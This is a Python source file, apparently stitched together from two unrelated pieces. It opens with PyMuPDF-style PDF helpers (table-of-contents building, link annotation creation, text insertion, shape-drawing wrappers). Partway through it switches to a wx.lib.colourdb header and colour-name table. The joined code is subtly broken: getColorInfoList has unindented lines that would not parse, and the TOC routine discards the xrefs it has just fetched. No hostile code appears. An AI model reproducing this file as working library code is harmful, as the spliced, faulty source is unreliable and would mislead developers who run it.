        raise ValueError("document closed or encrypted")
    if not doc.is_pdf:
        raise ValueError("is no PDF")
    if not toc:  # remove all entries
        return len(doc._delToC())

    # validity checks --------------------------------------------------------
    if type(toc) not in (list, tuple):
        raise ValueError("'toc' must be list or tuple")
    toclen = len(toc)
    page_count = doc.page_count
    t0 = toc[0]
    if type(t0) not in (list, tuple):
        raise ValueError("items must be sequences of 3 or 4 items")
    if t0[0] != 1:
        raise ValueError("hierarchy level of item 0 must be 1")
    # pairwise checks: page numbers in range, rows well-formed, and the
    # hierarchy level never increasing by more than 1 from row to row
    for i in list(range(toclen - 1)):
        t1 = toc[i]
        t2 = toc[i + 1]
        if not -1 <= t1[2] <= page_count:
            raise ValueError("row %i: page number out of range" % i)
        if (type(t2) not in (list, tuple)) or len(t2) not in (3, 4):
            raise ValueError("bad row %i" % (i + 1))
        if (type(t2[0]) is not int) or t2[0] < 1:
            raise ValueError("bad hierarchy level in row %i" % (i + 1))
        if t2[0] > t1[0] + 1:
            raise ValueError("bad hierarchy level in row %i" % (i + 1))
    # no formal errors in toc --------------------------------------------------

    # --------------------------------------------------------------------------
    # make a list of xref numbers, which we can use for our TOC entries
    # --------------------------------------------------------------------------
    old_xrefs = doc._delToC()  # del old outlines, get their xref numbers
    # prepare table of xrefs for new bookmarks
    # NOTE(review): the xrefs returned by _delToC() above are deliberately
    # discarded here, so every outline item gets a freshly allocated xref.
    old_xrefs = []
    xref = [0] + old_xrefs
    xref[0] = doc._getOLRootNumber()  # entry zero is outline root xref number
    if toclen > len(old_xrefs):  # too few old xrefs?
        for i in range((toclen - len(old_xrefs))):
            xref.append(doc.get_new_xref())  # acquire new ones

    lvltab = {0: 0}  # to store last entry per hierarchy level

    # ------------------------------------------------------------------------------
    # contains new outline objects as strings - first one is the outline root
    # ------------------------------------------------------------------------------
    olitems = [{"count": 0, "first": -1, "last": -1, "xref": xref[0]}]
    # ------------------------------------------------------------------------------
    # build olitems as a list of PDF-like connnected dictionaries
    # ------------------------------------------------------------------------------
    for i in range(toclen):
        o = toc[i]
        lvl = o[0]  # level
        title = get_pdf_str(o[1])  # title
        pno = min(doc.page_count - 1, max(0, o[2] - 1))  # page number
        page_xref = doc.page_xref(pno)
        page_height = doc.page_cropbox(pno).height
        top = Point(72, page_height - 36)  # default: 1 inch from left, 0.5 below top
        dest_dict = {"to": top, "kind": LINK_GOTO}  # fall back target
        if o[2] < 0:  # page number -1 means "no target"
            dest_dict["kind"] = LINK_NONE
        if len(o) > 3:  # some target is specified
            if type(o[3]) in (int, float):  # convert a number to a point
                dest_dict["to"] = Point(72, page_height - o[3])
            else:  # if something else, make sure we have a dict
                dest_dict = o[3] if type(o[3]) is dict else dest_dict
                if "to" not in dest_dict:  # target point not in dict?
                    dest_dict["to"] = top  # put default in
                else:  # transform target to PDF coordinates
                    point = +dest_dict["to"]
                    point.y = page_height - point.y
                    dest_dict["to"] = point
        # assemble one outline item with the standard PDF linkage slots;
        # -1 is used as "not present" sentinel for First/Last/Prev/Next
        d = {}
        d["first"] = -1
        d["count"] = 0
        d["last"] = -1
        d["prev"] = -1
        d["next"] = -1
        d["dest"] = getDestStr(page_xref, dest_dict)
        d["top"] = dest_dict["to"]
        d["title"] = title
        d["parent"] = lvltab[lvl - 1]
        d["xref"] = xref[i + 1]
        d["color"] = dest_dict.get("color")
        d["flags"] = dest_dict.get("italic", 0) + 2 * dest_dict.get("bold", 0)
        lvltab[lvl] = i + 1
        parent = olitems[lvltab[lvl - 1]]  # the parent entry

        if (
            dest_dict.get("collapse") or collapse and lvl > collapse
        ):  # suppress expansion
            parent["count"] -= 1  # make /Count negative
        else:
            parent["count"] += 1  # positive /Count

        if parent["first"] == -1:
            parent["first"] = i + 1
            parent["last"] = i + 1
        else:
            d["prev"] = parent["last"]
            prev = olitems[parent["last"]]
            prev["next"] = i + 1
            parent["last"] = i + 1
        olitems.append(d)

    # ------------------------------------------------------------------------------
    # now create each outline item as a string and insert it in the PDF
    # ------------------------------------------------------------------------------
    # NOTE(review): the root item (index 0) only has count/first/last/xref,
    # so the bare excepts below simply skip the keys it does not have.
    for i, ol in enumerate(olitems):
        txt = "<<"
        if ol["count"] != 0:
            txt += "/Count %i" % ol["count"]
        try:
            txt += ol["dest"]
        except:
            pass
        try:
            if ol["first"] > -1:
                txt += "/First %i 0 R" % xref[ol["first"]]
        except:
            pass
        try:
            if ol["last"] > -1:
                txt += "/Last %i 0 R" % xref[ol["last"]]
        except:
            pass
        try:
            if ol["next"] > -1:
                txt += "/Next %i 0 R" % xref[ol["next"]]
        except:
            pass
        try:
            if ol["parent"] > -1:
                txt += "/Parent %i 0 R" % xref[ol["parent"]]
        except:
            pass
        try:
            if ol["prev"] > -1:
                txt += "/Prev %i 0 R" % xref[ol["prev"]]
        except:
            pass
        try:
            txt += "/Title" + ol["title"]
        except:
            pass

        if ol.get("color") and len(ol["color"]) == 3:
            txt += "/C[ %g %g %g]" % tuple(ol["color"])
        if ol.get("flags", 0) > 0:
            txt += "/F %i" % ol["flags"]

        if i == 0:  # special: this is the outline root
            txt += "/Type/Outlines"  # so add the /Type entry
        txt += ">>"
        doc.update_object(xref[i], txt)  # insert the PDF object

    doc.init_doc()
    return toclen
def do_links(
    doc1: Document,
    doc2: Document,
    from_page: int = -1,
    to_page: int = -1,
    start_at: int = -1,
) -> None:
    """Insert links contained in copied page range into destination PDF.

    Parameter values **must** equal those of method insert_pdf(), which must
    have been previously executed.

    Args:
        doc1: destination document (pages were copied *into* it).
        doc2: source document (pages were copied *from* it).
        from_page, to_page: copied source page range (may be reversed).
        start_at: first destination page number of the copied range.
    Raises:
        ValueError: if start_at is negative.
    """

    # --------------------------------------------------------------------------
    # internal function to create the actual "/Annots" object string
    # --------------------------------------------------------------------------
    def cre_annot(lnk, xref_dst, pno_src, ctm):
        """Create annotation object string for a passed-in link."""
        r = lnk["from"] * ctm  # rect in PDF coordinates
        rect = "%g %g %g %g" % tuple(r)
        if lnk["kind"] == LINK_GOTO:
            txt = annot_skel["goto1"]  # annot_goto
            # position of the target page within the copied range gives the
            # index of the matching destination xref
            idx = pno_src.index(lnk["page"])
            p = lnk["to"] * ctm  # target point in PDF coordinates
            annot = txt % (xref_dst[idx], p.x, p.y, lnk["zoom"], rect)

        elif lnk["kind"] == LINK_GOTOR:
            if lnk["page"] >= 0:
                txt = annot_skel["gotor1"]  # annot_gotor
                pnt = lnk.get("to", Point(0, 0))  # destination point
                if type(pnt) is not Point:
                    pnt = Point(0, 0)
                annot = txt % (
                    lnk["page"],
                    pnt.x,
                    pnt.y,
                    lnk["zoom"],
                    lnk["file"],
                    lnk["file"],
                    rect,
                )
            else:  # named destination in the remote file
                txt = annot_skel["gotor2"]  # annot_gotor_n
                to = get_pdf_str(lnk["to"])
                to = to[1:-1]  # strip the enclosing parentheses
                f = lnk["file"]
                annot = txt % (to, f, rect)

        elif lnk["kind"] == LINK_LAUNCH:
            txt = annot_skel["launch"]  # annot_launch
            annot = txt % (lnk["file"], lnk["file"], rect)

        elif lnk["kind"] == LINK_URI:
            txt = annot_skel["uri"]  # annot_uri
            annot = txt % (lnk["uri"], rect)

        else:
            annot = ""

        return annot

    # --------------------------------------------------------------------------

    # validate & normalize parameters
    if from_page < 0:
        fp = 0
    elif from_page >= doc2.page_count:
        fp = doc2.page_count - 1
    else:
        fp = from_page

    if to_page < 0 or to_page >= doc2.page_count:
        tp = doc2.page_count - 1
    else:
        tp = to_page

    if start_at < 0:
        raise ValueError("'start_at' must be >= 0")
    sa = start_at

    incr = 1 if fp <= tp else -1  # page range could be reversed

    # lists of source / destination page numbers
    pno_src = list(range(fp, tp + incr, incr))
    pno_dst = [sa + i for i in range(len(pno_src))]

    # lists of source / destination page xrefs
    xref_src = []
    xref_dst = []
    for i in range(len(pno_src)):
        p_src = pno_src[i]
        p_dst = pno_dst[i]
        old_xref = doc2.page_xref(p_src)
        new_xref = doc1.page_xref(p_dst)
        xref_src.append(old_xref)
        xref_dst.append(new_xref)

    # create the links for each copied page in destination PDF
    for i in range(len(xref_src)):
        page_src = doc2[pno_src[i]]  # load source page
        links = page_src.get_links()  # get all its links
        if len(links) == 0:  # no links there
            page_src = None
            continue
        ctm = ~page_src.transformation_matrix  # calc page transformation matrix
        page_dst = doc1[pno_dst[i]]  # load destination page
        link_tab = []  # store all link definitions here
        for l in links:
            if l["kind"] == LINK_GOTO and (l["page"] not in pno_src):
                continue  # GOTO link target not in copied pages
            annot_text = cre_annot(l, xref_dst, pno_src, ctm)
            if annot_text:
                link_tab.append(annot_text)
        if link_tab != []:
            page_dst._addAnnot_FromString(tuple(link_tab))
    return
def getLinkText(page: Page, lnk: dict) -> str:
    """Build the "/Annots" PDF object string for a link dictionary.

    Fills one of the templates in module-level 'annot_skel' with the link
    rectangle and target data, transformed from page to PDF coordinates.
    A unique /NM id is appended unless 'lnk' refers to an existing link
    annotation on the page (update case). Returns "" for unsupported kinds.
    """
    # --------------------------------------------------------------------------
    # define skeletons for /Annots object texts
    # --------------------------------------------------------------------------
    ctm = page.transformation_matrix
    ictm = ~ctm  # maps page coordinates back to PDF coordinates
    r = lnk["from"]
    rect = "%g %g %g %g" % tuple(r * ictm)

    annot = ""
    if lnk["kind"] == LINK_GOTO:
        if lnk["page"] >= 0:
            txt = annot_skel["goto1"]  # annot_goto
            pno = lnk["page"]
            xref = page.parent.page_xref(pno)
            pnt = lnk.get("to", Point(0, 0))  # destination point
            ipnt = pnt * ictm
            annot = txt % (xref, ipnt.x, ipnt.y, lnk.get("zoom", 0), rect)
        else:  # named destination in this document
            txt = annot_skel["goto2"]  # annot_goto_n
            annot = txt % (get_pdf_str(lnk["to"]), rect)

    elif lnk["kind"] == LINK_GOTOR:
        if lnk["page"] >= 0:
            txt = annot_skel["gotor1"]  # annot_gotor
            pnt = lnk.get("to", Point(0, 0))  # destination point
            if type(pnt) is not Point:
                pnt = Point(0, 0)
            annot = txt % (
                lnk["page"],
                pnt.x,
                pnt.y,
                lnk.get("zoom", 0),
                lnk["file"],
                lnk["file"],
                rect,
            )
        else:  # named destination in the remote file
            txt = annot_skel["gotor2"]  # annot_gotor_n
            annot = txt % (get_pdf_str(lnk["to"]), lnk["file"], rect)

    elif lnk["kind"] == LINK_LAUNCH:
        txt = annot_skel["launch"]  # annot_launch
        annot = txt % (lnk["file"], lnk["file"], rect)

    elif lnk["kind"] == LINK_URI:
        txt = annot_skel["uri"]  # txt = annot_uri
        annot = txt % (lnk["uri"], rect)

    elif lnk["kind"] == LINK_NAMED:
        txt = annot_skel["named"]  # annot_named
        annot = txt % (lnk["name"], rect)
    if not annot:
        return annot

    # add a /NM PDF key to the object definition
    link_names = dict(  # existing ids and their xref
        [(x[0], x[2]) for x in page.annot_xrefs() if x[1] == PDF_ANNOT_LINK]
    )

    old_name = lnk.get("id", "")  # id value in the argument

    if old_name and (lnk["xref"], old_name) in link_names.items():
        name = old_name  # no new name if this is an update only
    else:
        # generate the first stem-based name not yet used on this page
        i = 0
        stem = TOOLS.set_annot_stem() + "-L%i"
        while True:
            name = stem % i
            if name not in link_names.values():
                break
            i += 1
    # add /NM key to object definition
    annot = annot.replace("/Link", "/Link/NM(%s)" % name)
    return annot
def delete_widget(page: Page, widget: Widget) -> Widget:
    """Delete a form field (widget) from the page and return the next one."""
    CheckParent(page)
    the_annot = getattr(widget, "_annot", None)
    if the_annot is None:
        raise ValueError("bad type: widget")
    # remember the follower before the current widget is destroyed
    next_widget = widget.next
    page.delete_annot(the_annot)
    widget._annot.__del__()
    widget._annot.parent = None
    # strip all instance attributes so the dead widget cannot be reused
    widget.__dict__.clear()
    return next_widget
def update_link(page: Page, lnk: dict) -> None:
    """Update an existing link on the current page in place."""
    CheckParent(page)
    annot_str = getLinkText(page, lnk)
    if not annot_str:
        raise ValueError("link kind not supported")
    # rewrite the existing annotation object identified by its xref
    page.parent.update_object(lnk["xref"], annot_str, page=page)
def insert_link(page: Page, lnk: dict, mark: bool = True) -> None:
    """Add a new link annotation to the current page.

    The 'mark' parameter is accepted for backward compatibility; it is not
    used by this implementation.
    """
    CheckParent(page)
    annot_str = getLinkText(page, lnk)
    if not annot_str:
        raise ValueError("link kind not supported")
    page._addAnnot_FromString((annot_str,))
def insert_textbox(
    page: Page,
    rect: rect_like,
    buffer: typing.Union[str, list],
    fontname: str = "helv",
    fontfile: OptStr = None,
    set_simple: int = 0,
    encoding: int = 0,
    fontsize: float = 11,
    lineheight: OptFloat = None,
    color: OptSeq = None,
    fill: OptSeq = None,
    expandtabs: int = 1,
    align: int = 0,
    rotate: int = 0,
    render_mode: int = 0,
    border_width: float = 0.05,
    morph: OptSeq = None,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> float:
    """Insert text into a given rectangle.

    Notes:
        Creates a Shape object, uses its same-named method and commits it.
    Parameters:
        rect: (rect-like) area to use for text.
        buffer: text to be inserted
        fontname: a Base-14 font, font name or '/name'
        fontfile: name of a font file
        fontsize: font size
        lineheight: overwrite the font property
        color: RGB color triple
        expandtabs: handles tabulators with string function
        align: left, center, right, justified
        rotate: 0, 90, 180, or 270 degrees
        morph: morph box with a matrix and a fixpoint
        overlay: put text in foreground or background
    Returns:
        unused or deficit rectangle area (float)
    """
    options = dict(
        fontsize=fontsize,
        lineheight=lineheight,
        fontname=fontname,
        fontfile=fontfile,
        set_simple=set_simple,
        encoding=encoding,
        color=color,
        fill=fill,
        expandtabs=expandtabs,
        render_mode=render_mode,
        border_width=border_width,
        align=align,
        rotate=rotate,
        morph=morph,
        stroke_opacity=stroke_opacity,
        fill_opacity=fill_opacity,
        oc=oc,
    )
    shape = page.new_shape()
    spare = shape.insert_textbox(rect, buffer, **options)
    # only commit when the text actually fitted (non-negative spare height)
    if spare >= 0:
        shape.commit(overlay)
    return spare
def insert_text(
    page: Page,
    point: point_like,
    text: typing.Union[str, list],
    fontsize: float = 11,
    lineheight: OptFloat = None,
    fontname: str = "helv",
    fontfile: OptStr = None,
    set_simple: int = 0,
    encoding: int = 0,
    color: OptSeq = None,
    fill: OptSeq = None,
    border_width: float = 0.05,
    render_mode: int = 0,
    rotate: int = 0,
    morph: OptSeq = None,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
):
    """Insert text lines starting at 'point'.

    Creates a Shape, delegates to its insert_text method and commits the
    result to the page. Returns the value reported by Shape.insert_text.
    """
    options = dict(
        fontsize=fontsize,
        lineheight=lineheight,
        fontname=fontname,
        fontfile=fontfile,
        set_simple=set_simple,
        encoding=encoding,
        color=color,
        fill=fill,
        border_width=border_width,
        render_mode=render_mode,
        rotate=rotate,
        morph=morph,
        stroke_opacity=stroke_opacity,
        fill_opacity=fill_opacity,
        oc=oc,
    )
    shape = page.new_shape()
    result = shape.insert_text(point, text, **options)
    # commit only on success (non-negative return)
    if result >= 0:
        shape.commit(overlay)
    return result
def new_page(
    doc: Document,
    pno: int = -1,
    width: float = 595,
    height: float = 842,
) -> Page:
    """Create and return a new page object.

    Args:
        pno: (int) insert before this page. Default: after last page.
        width: (float) page width in points. Default: 595 (ISO A4 width).
        height: (float) page height in points. Default 842 (ISO A4 height).
    Returns:
        A Page object.
    """
    doc._newPage(pno, width=width, height=height)
    # 'pno' also addresses the freshly inserted page (-1 = last page)
    return doc[pno]
def insert_page(
    doc: Document,
    pno: int,
    text: typing.Union[str, list, None] = None,
    fontsize: float = 11,
    width: float = 595,
    height: float = 842,
    fontname: str = "helv",
    fontfile: OptStr = None,
    color: OptSeq = (0,),
) -> int:
    """Create a new PDF page and insert some text.

    Notes:
        Function combining Document.new_page() and Page.insert_text().
        For parameter details see these methods.
    Returns:
        0 when no text was given, otherwise the insert_text() result.
    """
    page = doc.new_page(pno=pno, width=width, height=height)
    if not text:
        return 0
    # fixed insertion point: 50 pt from the left, 72 pt below the top
    return page.insert_text(
        (50, 72),
        text,
        fontsize=fontsize,
        fontname=fontname,
        fontfile=fontfile,
        color=color,
    )
def draw_line(
    page: Page,
    p1: point_like,
    p2: point_like,
    color: OptSeq = (0,),
    dashes: OptStr = None,
    width: float = 1,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    morph: OptSeq = None,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc=0,
) -> Point:
    """Draw a line from point p1 to point p2.

    Returns the value reported by Shape.draw_line.
    """
    pen = dict(
        color=color, dashes=dashes, width=width, closePath=False,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        stroke_opacity=stroke_opacity, fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_line(Point(p1), Point(p2))
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_squiggle(
    page: Page,
    p1: point_like,
    p2: point_like,
    breadth: float = 2,
    color: OptSeq = (0,),
    dashes: OptStr = None,
    width: float = 1,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    morph: OptSeq = None,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw a squiggly line from point p1 to point p2.

    Returns the value reported by Shape.draw_squiggle.
    """
    pen = dict(
        color=color, dashes=dashes, width=width, closePath=False,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        stroke_opacity=stroke_opacity, fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_squiggle(Point(p1), Point(p2), breadth=breadth)
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_zigzag(
    page: Page,
    p1: point_like,
    p2: point_like,
    breadth: float = 2,
    color: OptSeq = (0,),
    dashes: OptStr = None,
    width: float = 1,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    morph: OptSeq = None,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw a zigzag line from point p1 to point p2.

    Returns the value reported by Shape.draw_zigzag.
    """
    pen = dict(
        color=color, dashes=dashes, width=width, closePath=False,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        stroke_opacity=stroke_opacity, fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_zigzag(Point(p1), Point(p2), breadth=breadth)
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_rect(
    page: Page,
    rect: rect_like,
    color: OptSeq = (0,),
    fill: OptSeq = None,
    dashes: OptStr = None,
    width: float = 1,
    lineCap: int = 0,
    lineJoin: int = 0,
    morph: OptSeq = None,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
    radius=None,
) -> Point:
    """Draw a rectangle (optionally with rounded corners via 'radius').

    See the Shape class method of the same name for details.
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        stroke_opacity=stroke_opacity, fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_rect(Rect(rect), radius=radius)
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_quad(
    page: Page,
    quad: quad_like,
    color: OptSeq = (0,),
    fill: OptSeq = None,
    dashes: OptStr = None,
    width: float = 1,
    lineCap: int = 0,
    lineJoin: int = 0,
    morph: OptSeq = None,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw a quadrilateral.

    Returns the value reported by Shape.draw_quad.
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        stroke_opacity=stroke_opacity, fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_quad(Quad(quad))
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_polyline(
    page: Page,
    points: list,
    color: OptSeq = (0,),
    fill: OptSeq = None,
    dashes: OptStr = None,
    width: float = 1,
    morph: OptSeq = None,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    closePath: bool = False,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw multiple connected line segments.

    Returns the value reported by Shape.draw_polyline.
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        closePath=closePath, stroke_opacity=stroke_opacity,
        fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_polyline(points)
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_circle(
    page: Page,
    center: point_like,
    radius: float,
    color: OptSeq = (0,),
    fill: OptSeq = None,
    morph: OptSeq = None,
    dashes: OptStr = None,
    width: float = 1,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw a circle given its center and radius.

    Returns the value reported by Shape.draw_circle.
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        stroke_opacity=stroke_opacity, fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_circle(Point(center), radius)
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_oval(
    page: Page,
    rect: typing.Union[rect_like, quad_like],
    color: OptSeq = (0,),
    fill: OptSeq = None,
    dashes: OptStr = None,
    morph: OptSeq = None,
    width: float = 1,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw an oval given its containing rectangle or quad.

    Returns the value reported by Shape.draw_oval.
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        stroke_opacity=stroke_opacity, fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_oval(rect)
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_curve(
    page: Page,
    p1: point_like,
    p2: point_like,
    p3: point_like,
    color: OptSeq = (0,),
    fill: OptSeq = None,
    dashes: OptStr = None,
    width: float = 1,
    morph: OptSeq = None,
    closePath: bool = False,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw a special Bezier curve from p1 to p3.

    Control points are generated on lines p1 to p2 and p2 to p3.
    Returns the value reported by Shape.draw_curve.
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        closePath=closePath, stroke_opacity=stroke_opacity,
        fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_curve(Point(p1), Point(p2), Point(p3))
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_bezier(
    page: Page,
    p1: point_like,
    p2: point_like,
    p3: point_like,
    p4: point_like,
    color: OptSeq = (0,),
    fill: OptSeq = None,
    dashes: OptStr = None,
    width: float = 1,
    # FIX: was annotated OptStr — 'morph' is a (matrix, fixpoint) sequence,
    # consistent with every other draw_* function in this module.
    morph: OptSeq = None,
    closePath: bool = False,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw a general cubic Bezier curve from p1 to p4.

    Control points p2 and p3 shape the curve.
    Returns the value reported by Shape.draw_bezier.
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        closePath=closePath, stroke_opacity=stroke_opacity,
        fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_bezier(Point(p1), Point(p2), Point(p3), Point(p4))
    shape.finish(**pen)
    shape.commit(overlay)
    return result
def draw_sector(
    page: Page,
    center: point_like,
    point: point_like,
    beta: float,
    color: OptSeq = (0,),
    fill: OptSeq = None,
    dashes: OptStr = None,
    fullSector: bool = True,
    morph: OptSeq = None,
    width: float = 1,
    closePath: bool = False,
    lineCap: int = 0,
    lineJoin: int = 0,
    overlay: bool = True,
    stroke_opacity: float = 1,
    fill_opacity: float = 1,
    oc: int = 0,
) -> Point:
    """Draw a circle sector given circle center, one arc end point and the angle of the arc.

    Parameters:
        center -- center of circle
        point -- arc end point
        beta -- angle of arc (degrees)
        fullSector -- connect arc ends with center
    """
    pen = dict(
        color=color, fill=fill, dashes=dashes, width=width,
        lineCap=lineCap, lineJoin=lineJoin, morph=morph,
        closePath=closePath, stroke_opacity=stroke_opacity,
        fill_opacity=fill_opacity, oc=oc,
    )
    shape = page.new_shape()
    result = shape.draw_sector(Point(center), Point(point), beta, fullSector=fullSector)
    shape.finish(**pen)
    shape.commit(overlay)
    return result
# ----------------------------------------------------------------------
# Name: wx.lib.colourdb.py
# Purpose: Adds a bunch of colour names and RGB values to the
# colour database so they can be found by name
#
# Author: Robin Dunn
#
# Created: 13-March-2001
# Copyright: (c) 2001-2017 by Total Control Software
# Licence: wxWindows license
# Tags: phoenix-port, unittest, documented
# ----------------------------------------------------------------------
def getColorList() -> list:
    """
    Returns a list of just the colour names used by this module.

    :rtype: list of strings
    """
    # each info tuple is (NAME, r, g, b) — keep only the name
    return [name for name, _, _, _ in getColorInfoList()]
def getColorInfoList() -> list:
"""
Returns the list of colour name/value tuples used by this module.
:rtype: list of tuples
"""
return [
("ALICEBLUE", 240, 248, 255),
("ANTIQUEWHITE", 250, 235, 215),
("ANTIQUEWHITE1", 255, 239, 219),
("ANTIQUEWHITE2", 238, 223, 204),
("ANTIQUEWHITE3", 205, 192, 176),
("ANTIQUEWHITE4", 139, 131, 120),
("AQUAMARINE", 127, 255, 212),
("AQUAMARINE1", 127, 255, 212),
("AQUAMARINE2", 118, 238, 198),
("AQUAMARINE3", 102, 205, 170),
("AQUAMARINE4", 69, 139, 116),
("AZURE", 240, 255, 255),
("AZURE1", 240, 255, 255),
("AZURE2", 224, 238, 238),
("AZURE3", 193, 205, 205),
("AZURE4", 131, 139, 139),
("BEIGE", 245, 245, 220),
("BISQUE", 255, 228, 196),
("BISQUE1", 255, 228, 196),
("BISQUE2", 238, 213, 183),
("BISQUE3", 205, 183, 158),
("BISQUE4", 139, 125, 107),
("BLACK", 0, 0, 0),
("BLANCHEDALMOND", 255, 235, 205),
("BLUE", 0, 0, 255),
("BLUE1", 0, 0, 255),
("BLUE2", 0, 0, 238),
("BLUE3", 0, 0, 205),
("BLUE4", 0, 0, 139),
("BLUEVIOLET", 138, 43, 226),
("BROWN", 165, 42, 42),
("BROWN1", 255, 64, 64),
("BROWN2", 238, 59, 59),
("BROWN3", 205, 51, 51),
("BROWN4", 139, 35, 35),
("BURLYWOOD", 222, 184, 135),
("BURLYWOOD1", 255, 211, 155),
("BURLYWOOD2", 238, 197, 145),
("BURLYWOOD3", 205, 170, 125),
("BURLYWOOD4", 139, 115, 85),
("CADETBLUE", 95, 158, 160),
("CADETBLUE1", 152, 245, 255),
("CADETBLUE2", 142, 229, 238),
("CADETBLUE3", 122, 197, 205),
("CADETBLUE4", 83, 134, 139),
("CHARTREUSE", 127, 255, 0),
("CHARTREUSE1", 127, 255, 0),
("CHARTREUSE2", 118, 238, 0),
("CHARTREUSE3", 102, 205, 0),
("CHARTREUSE4", 69, 139, 0),
("CHOCOLATE", 210, 105, 30),
("CHOCOLATE1", 255, 127, 36),
("CHOCOLATE2", 238, 118, 33),
("CHOCOLATE3", 205, 102, 29),
("CHOCOLATE4", 139, 69, 19),
("COFFEE", 156, 79, 0),
("CORAL", 255, 127, 80),
("CORAL1", 255, 114, 86),
("CORAL2", 238, 106, 80),
("CORAL3", 205, 91, 69),
("CORAL4", 139, 62, 47),
("CORNFLOWERBLUE", 100, 149, 237),
("CORNSILK", 255, 248, 220),
("CORNSILK1", 255, 248, 220),
("CORNSILK2", 238, 232, 205),
("CORNSILK3", 205, 200, 177),
("CORNSILK4", 139, 136, 120),
("CYAN", 0, 255, 255),
("CYAN1", 0, 255, 255),
("CYAN2", 0, 238, 238),
("CYAN3", 0, 205, 205),
("CYAN4", 0, 139, 139),
("DARKBLUE", 0, 0, 139),
("DARKCYAN", 0, 139, 139),
("DARKGOLDENROD", 184, 134, 11),
("DARKGOLDENROD1", 255, 185, 15),
("DARKGOLDENROD2", 238, 173, 14),
("DARKGOLDENROD3", 205, 149, 12),
("DARKGOLDENROD4", 139, 101, 8),
("DARKGREEN", 0, 100, 0),
("DARKGRAY", 169, 169, 169),
("DARKKHAKI", 189, 183, 107),
("DARKMAGENTA", 139, 0, 139),
("DARKOLIVEGREEN", 85, 107, 47),
("DARKOLIVEGREEN1", 202, 255, 112),
("DARKOLIVEGREEN2", 188, 238, 104),
("DARKOLIVEGREEN3", 162, 205, 90),
("DARKOLIVEGREEN4", 110, 139, 61),
("DARKORANGE", 255, 140, 0),
("DARKORANGE1", 255, 127, 0),
("DARKORANGE2", 238, 118, 0),
("DARKORANGE3", 205, 102, 0),
("DARKORANGE4", 139, 69, 0),
("DARKORCHID", 153, 50, 204),
("DARKORCHID1", 191, 62, 255),
("DARKORCHID2", 178, 58, 238),
("DARKORCHID3", 154, 50, 205),
("DARKORCHID4", 104, 34, 139),
("DARKRED", 139, 0, 0),
("DARKSALMON", 233, 150, 122),
("DARKSEAGREEN", 143, 188, 143),
("DARKSEAGREEN1", 193, 255, 193),
("DARKSEAGREEN2", 180, 238, 180),
("DARKSEAGREEN3", 155, 205, 155),
("DARKSEAGREEN4", 105, 139, 105),
